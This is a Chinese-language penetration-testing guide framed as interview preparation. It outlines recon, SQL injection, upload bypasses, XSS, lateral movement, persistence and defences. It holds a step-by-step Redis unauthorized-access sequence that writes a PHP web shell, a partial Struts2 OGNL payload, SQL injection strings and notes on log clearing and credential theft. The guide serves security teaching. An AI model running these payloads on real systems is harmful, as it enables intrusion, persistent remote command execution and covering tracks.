渗透测试面试问题合集
字数 1670 2025-08-15 21:31:37

渗透测试全面指南

一、渗透测试流程概述

1. 信息收集阶段

  • 服务器信息收集

    • 真实IP、系统类型、版本、开放端口、WAF识别
    • 方法:Nmap扫描、WAF指纹识别、CDN检测
  • 网站指纹识别

    • CMS识别(如WordPress、DedeCMS)
    • 证书信息分析、DNS记录查询
    • 工具:WhatWeb、Wappalyzer
  • WHOIS信息

    • 注册者姓名、备案信息、邮箱、电话
    • 反查技巧:社工库查询、关联信息挖掘
  • 子域名与旁站

    • 子域名枚举(subdomain、Sublist3r)
    • C段扫描、旁站检测
    • Google Hacking技巧(site:、filetype:pdf等)

2. 漏洞挖掘阶段

  • 常见漏洞类型

    • Web漏洞:XSS、SQL注入、文件上传、命令注入
    • 服务漏洞:弱口令、未授权访问、配置错误
    • 中间件漏洞:IIS解析漏洞、Nginx目录穿越
  • 自动化工具

    • SQLMap、Burp Suite、Metasploit
    • 漏扫工具:Nessus、OpenVAS

3. 漏洞利用与提权

  • Windows提权

    • 服务提权(MySQL、Serv-U)
    • 内核漏洞利用(如MS08-067)
  • Linux提权

    • 脏牛漏洞(Dirty Cow)
    • sudo配置错误、SUID滥用

4. 后渗透与报告

  • 日志清理

    • /var/log/清理(auth.log、secure等)
    • Windows事件日志清除
  • 报告编写

    • 漏洞详情、风险等级、修复建议
    • 复测流程与验证方法

二、核心技术详解

1. SQL注入深度解析

  • 注入类型

    UNION SELECT 1,2,3-- 
    AND 1=CONVERT(int, @@version)
    
  • 绕过技巧

    • 编码绕过(Hex、Base64)
    • 注释符混淆(/**/、--%0a)
    • 等价函数替换
  • 防御方案

    • 预编译语句
    • 输入过滤与白名单
    • 最小权限原则

2. 文件上传漏洞

  • 常见绕过方式

    • 双扩展名(.php.jpg)
    • 大小写变异(PhP)
    • 内容检测绕过(GIF头)
  • 防护措施

    • MIME类型校验
    • 文件内容检测
    • 随机重命名

3. XSS攻击体系

  • 三种类型对比

    类型 存储位置 持久性
    反射型 URL参数 非持久
    存储型 数据库 持久
    DOM型 前端代码 视情况
  • 高级利用

    
    
    • Cookie窃取
    • 键盘记录
    • BeEF框架集成

4. CSRF防御机制

  • Token实现
    <input type="hidden" name="csrf_token" value="随机字符串">
    
  • SameSite Cookie属性
  • 验证Referer头

三、内网渗透技术

1. 横向移动手法

  • 协议利用

    • SMB爆破(永恒之蓝)
    • RDP劫持
    • WMI远程执行
  • 凭证获取

    • Mimikatz抓取
    • SAM数据库提取
    • 票据传递攻击

2. 权限维持

  • 后门技术

    • WebShell隐藏(.htaccess)
    • 服务注册
    • 计划任务
  • 隐蔽通道

    • DNS隧道
    • ICMP隐蔽通信
    • HTTP头部伪装

四、漏洞利用实例

1. Redis未授权访问

# 关键步骤:
1. redis-cli -h 目标IP
2. config set dir /var/www/html
3. config set dbfilename shell.php
4. set x "<?php system($_GET['cmd']);?>"
5. save

2. Struts2漏洞利用

POST /struts2-showcase/ HTTP/1.1
Content-Type: %{(#nike='multipart/form-data').(#dm=@ognl.OgnlContext@DEFAULT_MEMBER_ACCESS)...}

五、防御体系建设

1. 安全配置清单

  • 服务器加固

    • 关闭不必要服务
    • 定期更新补丁
    • 防火墙规则优化
  • 应用层防护

    • WAF规则配置
    • RASP技术部署
    • 输入输出过滤

2. 监控与响应

  • 日志分析

    • ELK Stack部署
    • 异常行为检测
  • 应急响应

    • 事件分类分级
    • 取证流程
    • 恢复方案

六、附录:工具速查表

工具名称 用途 示例命令
Nmap 端口扫描 nmap -sV -O 目标IP
SQLMap SQL注入 sqlmap -u "url" --risk=3
Metasploit 漏洞利用 use exploit/multi/handler
Burp Suite Web代理 拦截修改HTTP请求
Cobalt Strike 远控平台 生成Beacon

本指南持续更新,建议结合实战环境进行验证测试。所有技术仅限合法授权使用,请遵守网络安全法律法规。

渗透测试全面指南 一、渗透测试流程概述 1. 信息收集阶段 服务器信息收集 : 真实IP、系统类型、版本、开放端口、WAF识别 方法:Nmap扫描、WAF指纹识别、CDN检测 网站指纹识别 : CMS识别(如WordPress、DedeCMS) 证书信息分析、DNS记录查询 工具:WhatWeb、Wappalyzer WHOIS信息 : 注册者姓名、备案信息、邮箱、电话 反查技巧:社工库查询、关联信息挖掘 子域名与旁站 : 子域名枚举(subdomain、Sublist3r) C段扫描、旁站检测 Google Hacking技巧(site:、filetype:pdf等) 2. 漏洞挖掘阶段 常见漏洞类型 : Web漏洞:XSS、SQL注入、文件上传、命令注入 服务漏洞:弱口令、未授权访问、配置错误 中间件漏洞:IIS解析漏洞、Nginx目录穿越 自动化工具 : SQLMap、Burp Suite、Metasploit 漏扫工具:Nessus、OpenVAS 3. 漏洞利用与提权 Windows提权 : 服务提权(MySQL、Serv-U) 内核漏洞利用(如MS08-067) Linux提权 : 脏牛漏洞(Dirty Cow) sudo配置错误、SUID滥用 4. 后渗透与报告 日志清理 : /var/log/清理(auth.log、secure等) Windows事件日志清除 报告编写 : 漏洞详情、风险等级、修复建议 复测流程与验证方法 二、核心技术详解 1. SQL注入深度解析 注入类型 : 绕过技巧 : 编码绕过(Hex、Base64) 注释符混淆(/** /、--%0a) 等价函数替换 防御方案 : 预编译语句 输入过滤与白名单 最小权限原则 2. 文件上传漏洞 常见绕过方式 : 双扩展名(.php.jpg) 大小写变异(PhP) 内容检测绕过(GIF头) 防护措施 : MIME类型校验 文件内容检测 随机重命名 3. XSS攻击体系 三种类型对比 : | 类型 | 存储位置 | 持久性 | |---|---|---| | 反射型 | URL参数 | 非持久 | | 存储型 | 数据库 | 持久 | | DOM型 | 前端代码 | 视情况 | 高级利用 : Cookie窃取 键盘记录 BeEF框架集成 4. CSRF防御机制 Token实现 : SameSite Cookie属性 验证Referer头 三、内网渗透技术 1. 横向移动手法 协议利用 : SMB爆破(永恒之蓝) RDP劫持 WMI远程执行 凭证获取 : Mimikatz抓取 SAM数据库提取 票据传递攻击 2. 权限维持 后门技术 : WebShell隐藏(.htaccess) 服务注册 计划任务 隐蔽通道 : DNS隧道 ICMP隐蔽通信 HTTP头部伪装 四、漏洞利用实例 1. Redis未授权访问 2. Struts2漏洞利用 五、防御体系建设 1. 安全配置清单 服务器加固 : 关闭不必要服务 定期更新补丁 防火墙规则优化 应用层防护 : WAF规则配置 RASP技术部署 输入输出过滤 2. 监控与响应 日志分析 : ELK Stack部署 异常行为检测 应急响应 : 事件分类分级 取证流程 恢复方案 六、附录:工具速查表 | 工具名称 | 用途 | 示例命令 | |---|---|---| | Nmap | 端口扫描 | nmap -sV -O 目标IP | | SQLMap | SQL注入 | sqlmap -u "url" --risk=3 | | Metasploit | 漏洞利用 | use exploit/multi/handler | | Burp Suite | Web代理 | 拦截修改HTTP请求 | | Cobalt Strike | 远控平台 | 生成Beacon | 本指南持续更新,建议结合实战环境进行验证测试。所有技术仅限合法授权使用,请遵守网络安全法律法规。